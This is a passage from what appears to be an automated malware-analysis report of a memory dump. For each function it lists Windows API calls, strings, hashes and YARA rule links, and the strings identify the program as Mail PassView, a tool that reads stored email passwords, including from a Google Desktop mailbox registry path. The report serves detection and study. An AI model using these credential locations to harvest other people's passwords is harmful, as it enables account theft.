                                                                                                    • Instruction ID: 4a1c6cf285358ebc60a306e6e4607d202acce7e44454db846991f846a9516d87
                                                                                                    • Opcode Fuzzy Hash: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
                                                                                                    • Instruction Fuzzy Hash: 820184B5A00118BBDB10A6569D02FDE7A6C9B94399F004076FF08F2251E2389F95C698
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00405F41, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?), ref: 00405F51
                                                                                                    • sprintf.MSVCRT ref: 00405F79
                                                                                                    • MessageBoxA.USER32(00000000,?,Error,00000030), ref: 00405F92
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastMessagesprintf
                                                                                                    • String ID: Error$Error %d: %s
                                                                                                    • API String ID: 1670431679-1552265934
                                                                                                    • Opcode ID: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
                                                                                                    • Instruction ID: dfdfd8ae3da356d4892d02c8fdfc7d0b76dc1d64d686e07e92b09a376f71314b
                                                                                                    • Opcode Fuzzy Hash: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
                                                                                                    • Instruction Fuzzy Hash: 9BF0A7B640010876CB10A764DC05FDA76BCAB44704F1440B6BA05E2141EAB4DB458FAC
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040F037, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,769271C0,00405C41,00000000), ref: 0040F040
                                                                                                    • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040F04E
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0040F066
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                    • API String ID: 145871493-1506664499
                                                                                                    • Opcode ID: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                                                                    • Instruction ID: e435a3077eadc7ffcc94e3fda903fcc6a6103b68d0c251917c13f6f883115a60
                                                                                                    • Opcode Fuzzy Hash: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                                                                    • Instruction Fuzzy Hash: 70D0C2323002106B96605B326C0CAEB2D55EBC47527048032F505E1250EB648A86C1A8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407406, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 104stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                    • String ID: &v@
                                                                                                    • API String ID: 3110682361-3426253984
                                                                                                    • Opcode ID: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
                                                                                                    • Instruction ID: 0225f7a5d6cb17f6a7661d1d380ab710e59dbb599c3936da0c6da93344c8566d
                                                                                                    • Opcode Fuzzy Hash: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
                                                                                                    • Instruction Fuzzy Hash: B731F772D0411DABDB10DB68CC81BDEBBB8EF45318F1001B6E645B3281DA78AE858B95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00409695, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                      • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,76020A60,00000000,?,?,004092ED,00000001,00412B1C,76020A60), ref: 00405F17
                                                                                                    • memset.MSVCRT ref: 004096CB
                                                                                                      • Part of subcall function 0040F09D: memcpy.MSVCRT ref: 0040F10B
                                                                                                      • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                                                      • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                                                    • sprintf.MSVCRT ref: 00409710
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite_strlwrmemcpymemsetsprintfstrcpystrlen
                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                    • API String ID: 3200591283-2769808009
                                                                                                    • Opcode ID: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                                                                    • Instruction ID: f0c093cdac9801847eaa7418f237768de61d650e358e632480a4b045718b8cde
                                                                                                    • Opcode Fuzzy Hash: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                                                                    • Instruction Fuzzy Hash: FE11E731500515BFC711AF25CC42E967B64FF04318F10006AF549369A2EB76BA64DFD8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407BF9, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetParent.USER32(?), ref: 00407C0B
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00407C18
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00407C23
                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00407C33
                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00407C4F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                    • String ID:
                                                                                                    • API String ID: 4247780290-0
                                                                                                    • Opcode ID: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
                                                                                                    • Instruction ID: 06ac4e87c023cdd11bbb76a881eefb098f7857fbb12a9e12d40a619b69e20d01
                                                                                                    • Opcode Fuzzy Hash: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
                                                                                                    • Instruction Fuzzy Hash: A7014C32800129BBDB119BA5DD89EFF7FBCEF46750F048129F901E2150D7B89541CBA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040A4C8, Relevance: 7.5, APIs: 5, Instructions: 47windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040A4F5
                                                                                                      • Part of subcall function 00405E2C: LoadCursorA.USER32(00000000,00007F02), ref: 00405E33
                                                                                                      • Part of subcall function 00405E2C: SetCursor.USER32(00000000,?,0040BAC6), ref: 00405E3A
                                                                                                    • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040A518
                                                                                                      • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A45D
                                                                                                      • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A487
                                                                                                      • Part of subcall function 0040A437: strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                                                                      • Part of subcall function 0040A437: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A4C0
                                                                                                    • SetCursor.USER32(?,?,0040B6B6), ref: 0040A53D
                                                                                                    • SetFocus.USER32(?,?,?,0040B6B6), ref: 0040A54F
                                                                                                    • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040A566
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Cursor$sprintf$FocusLoadstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 2210206837-0
                                                                                                    • Opcode ID: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                                                                    • Instruction ID: 5ceab2a0550c6f7be61398745e2f8fe4621b0361104972d0b8848fcf02267a2c
                                                                                                    • Opcode Fuzzy Hash: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                                                                    • Instruction Fuzzy Hash: 12116DB1200600EFD722AB74DC85FAA77EDFF48344F0644B9F1599B2B1CA716D018B10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00409867, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040988A
                                                                                                    • memset.MSVCRT ref: 004098A0
                                                                                                      • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                      • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,76020A60,00000000,?,?,004092ED,00000001,00412B1C,76020A60), ref: 00405F17
                                                                                                      • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                                                      • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                                                    • sprintf.MSVCRT ref: 004098D7
                                                                                                    Strings
                                                                                                    • <%s>, xrefs: 004098D1
                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 004098A5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                                                    • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                    • API String ID: 3202206310-1998499579
                                                                                                    • Opcode ID: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                                                                    • Instruction ID: 66925a684df18266fce8bb701fa3a75b356ea9bacad4fe0319972b489c667c97
                                                                                                    • Opcode Fuzzy Hash: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                                                                    • Instruction Fuzzy Hash: BC01A77290011976D721A759CC46FDA7B6C9F44304F0400FAB509B3192DB789F858BA8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00408572, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                                    • Instruction ID: 0a64c6e0650ef7a992325d71cca8afebdafc0e64b7e6075a64aa0ecb46f153ec
                                                                                                    • Opcode Fuzzy Hash: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                                    • Instruction Fuzzy Hash: C2F0F4725057016FDB209F6A99C0497B7D6BB48714B64083FF18AD3741CF78AD818A18
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004085D8, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004085F3
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00408606
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00408619
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040862C
                                                                                                    • free.MSVCRT(00000000), ref: 00408640
                                                                                                      • Part of subcall function 00406B5B: free.MSVCRT(00000000,00406DE2,00000000,?,?), ref: 00406B62
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??3@$free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2241099983-0
                                                                                                    • Opcode ID: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                                                                    • Instruction ID: 9ddd328a78e70669a2f2a4495a49ad6ad9a3331e0dda25fcf26d4743fc91c851
                                                                                                    • Opcode Fuzzy Hash: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                                                                    • Instruction Fuzzy Hash: E3F0F6729028306BC9213B275011A8EB3657D4171431B056FF946BB7A28F3C6E9246FD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040E81A, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004062D1: memset.MSVCRT ref: 004062F1
                                                                                                      • Part of subcall function 004062D1: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                                                                      • Part of subcall function 004062D1: _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0040E841
                                                                                                    • GetSysColor.USER32(00000005), ref: 0040E849
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0040E853
                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 0040E861
                                                                                                    • GetSysColorBrush.USER32(00000005), ref: 0040E869
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Color$BrushClassModeNameText_stricmpmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1869857563-0
                                                                                                    • Opcode ID: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                                                                    • Instruction ID: 70d3a7b2db974a4d4567ef1bfe72cf66993607b5e30e9ab541cb73924f0fe55d
                                                                                                    • Opcode Fuzzy Hash: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                                                                    • Instruction Fuzzy Hash: 8CF01D32100205BBDF152FA6DD09E9E3F25EF08711F10C53AFA19A51E1CAB5D970DB58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B105, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(?), ref: 0040B13E
                                                                                                    • SetFocus.USER32(?,?,?), ref: 0040B1E4
                                                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B2E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DestroyFocusInvalidateRectWindow
                                                                                                    • String ID: `5A
                                                                                                    • API String ID: 3502187192-343712130
                                                                                                    • Opcode ID: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                                                                    • Instruction ID: 7dc3b259c8ef6dbe6f4b6ee630ad47b8a618685bd7b93527759b10f323b3e488
                                                                                                    • Opcode Fuzzy Hash: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                                                                    • Instruction Fuzzy Hash: 2B519130A043019BCB25BF658845E9AB3E0EF54724F44C57FF4696F2E1CB7999818B8E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00405CEE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • BeginDeferWindowPos.USER32(0000000B), ref: 00405D07
                                                                                                      • Part of subcall function 0040169B: GetDlgItem.USER32(?,?), ref: 004016AB
                                                                                                      • Part of subcall function 0040169B: GetClientRect.USER32(?,?), ref: 004016BD
                                                                                                      • Part of subcall function 0040169B: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401727
                                                                                                    • EndDeferWindowPos.USER32(?), ref: 00405DD8
                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 00405DE3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                    • String ID: $
                                                                                                    • API String ID: 2498372239-3993045852
                                                                                                    • Opcode ID: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
                                                                                                    • Instruction ID: 46e20a5f719da2480e3b09a58904212cef45bdfb275aa5f1a4c21840a4711c1e
                                                                                                    • Opcode Fuzzy Hash: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
                                                                                                    • Instruction Fuzzy Hash: EB316D30641254BBCB216F13DD49D9F3F7CEF86BA4F10483DB409762A1C6798E10DAA8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040719C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040EB3F: RegOpenKeyExA.ADVAPI32(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                    • memset.MSVCRT ref: 004071D7
                                                                                                      • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407225
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407242
                                                                                                    Strings
                                                                                                    • Software\Google\Google Desktop\Mailboxes, xrefs: 004071AF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Close$EnumOpenmemset
                                                                                                    • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                    • API String ID: 2255314230-2212045309
                                                                                                    • Opcode ID: 452db49ed067e6e6e63c10348168c8f88923fb1a9b6aea3e0d2cfe22e4762b25
                                                                                                    • Instruction ID: abca04dfe3767426288f52b4a512d9ce3e2bfadbcd13eaa8a3c626f28e0c8a54
                                                                                                    • Opcode Fuzzy Hash: 452db49ed067e6e6e63c10348168c8f88923fb1a9b6aea3e0d2cfe22e4762b25
                                                                                                    • Instruction Fuzzy Hash: A71142728083456BD710EE52DC01EAB7BECEB84344F04093EF995E1191E735E628DAA7
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B70A, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegisterClassA.USER32(?), ref: 0040B74B
                                                                                                    • CreateWindowExA.USER32(00000000,MailPassView,Mail PassView,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,?), ref: 0040B776
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ClassCreateRegisterWindow
                                                                                                    • String ID: Mail PassView$MailPassView
                                                                                                    • API String ID: 3469048531-1277648965
                                                                                                    • Opcode ID: 7d9b3190e156b9bfff027be3e0f607fb910863f17b47cbf685ca248547ef7640
                                                                                                    • Instruction ID: f223c9819260e0b75888b36d0bfde8daf7ba5992c102a2aca34afaaeb944facf
                                                                                                    • Opcode Fuzzy Hash: 7d9b3190e156b9bfff027be3e0f607fb910863f17b47cbf685ca248547ef7640
                                                                                                    • Instruction Fuzzy Hash: 3601ECB5D01248ABDB10CF96CD45ADFFFF8EB99B00F10812AE555F2250D7B46544CB68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00401085, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                                                                      • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 004010A4
                                                                                                    • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 004010C3
                                                                                                    • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 004010E0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetstrcpy
                                                                                                    • String ID: MS Sans Serif
                                                                                                    • API String ID: 4251605573-168460110
                                                                                                    • Opcode ID: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
                                                                                                    • Instruction ID: 11d026e54a5ae2454c64c325e08d9e616df03e05f7163fa19ba200447038793b
                                                                                                    • Opcode Fuzzy Hash: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
                                                                                                    • Instruction Fuzzy Hash: 73F0A775A8034877E72167A0ED47F8A7BACAB40B00F10C135FB61B51E1D6F47554DB58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040DE43, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT ref: 0040DE5D
                                                                                                    • memcpy.MSVCRT ref: 0040DE6F
                                                                                                    • DialogBoxParamA.USER32(0000006B,?,Function_0000DB39,00000000), ref: 0040DE93
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$DialogParam
                                                                                                    • String ID: V7
                                                                                                    • API String ID: 392721444-2959985473
                                                                                                    • Opcode ID: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
                                                                                                    • Instruction ID: 1a8743d5fef8bbef7923f2c95fec7d45d4f15d0a806a7122114c86eec2fd18b9
                                                                                                    • Opcode Fuzzy Hash: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
                                                                                                    • Instruction Fuzzy Hash: 93F0A7716843207BD7116F54AC06BC63BF2B704B5AF114926F149E40E1D3F56550CBCC
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004062D1, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004062F1
                                                                                                    • GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                                                                    • _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ClassName_stricmpmemset
                                                                                                    • String ID: edit
                                                                                                    • API String ID: 3665161774-2167791130
                                                                                                    • Opcode ID: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                                                                    • Instruction ID: 6efc07277a00def775dca084f59963aaad452a70fda198cb5006c56c80a8bddd
                                                                                                    • Opcode Fuzzy Hash: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                                                                    • Instruction Fuzzy Hash: 75E09BB3C4412A7ADB21A764DC05FE53BAC9F59305F0001B6BD46E10D5E5B497C887A5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040EDAC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,76020A60,?,00000000), ref: 0040EDBA
                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                    • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                    • API String ID: 2574300362-543337301
                                                                                                    • Opcode ID: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                                                                    • Instruction ID: 9298da647e7f97f850720a93b521a1101e1548fa407b312faad19db7241a3124
                                                                                                    • Opcode Fuzzy Hash: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                                                                    • Instruction Fuzzy Hash: 4BD0C970649202EFC7008F21AE097813ABABB18703F10C537A506E1AA0F7B88190CF5C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040FE05, Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1860491036-0
                                                                                                    • Opcode ID: 81e4c2bd5d4cdef042fe5c8882a3adc9c8e3ad7cfca39d04153879c91be1a083
                                                                                                    • Instruction ID: d938b1c2a289ef47e5423cea375f2860c04713c819a512dfc676868f3ea794ac
                                                                                                    • Opcode Fuzzy Hash: 81e4c2bd5d4cdef042fe5c8882a3adc9c8e3ad7cfca39d04153879c91be1a083
                                                                                                    • Instruction Fuzzy Hash: CC3146B0A107008FD7609F3AD845666FBE4EF80355F25887FD20ADB6B2E7B8D4448B59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040BD0B, Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$memcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 368790112-0
                                                                                                    • Opcode ID: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                                                                    • Instruction ID: 14e83d3a51f9c3b731822f35bbce0da2433a64988b134a744f8d54487411a0b4
